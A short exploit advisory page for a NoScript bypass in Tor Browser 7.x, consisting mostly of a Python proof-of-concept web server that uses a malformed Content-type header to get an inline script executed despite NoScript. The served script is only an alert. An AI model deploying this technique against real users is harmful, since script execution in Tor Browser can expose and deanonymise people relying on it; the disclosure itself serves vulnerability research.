Tor Browser 7.x NoScript Bypass

Tor Browser version 7.x suffers from a NoScript bypass vulnerability.


MD5 | ef38c2b6e0e85e188cbd26b95cee544f

#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer

PORT_NUMBER = 31337

class myHandler(BaseHTTPRequestHandler):

#Handler for the GET requests
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html;/json') # Here is where the magic happens
self.end_headers()
self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>")
return

try:
server = HTTPServer(('', PORT_NUMBER), myHandler)
print 'Started httpserver on port ' , PORT_NUMBER
server.serve_forever()

except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()



Related Posts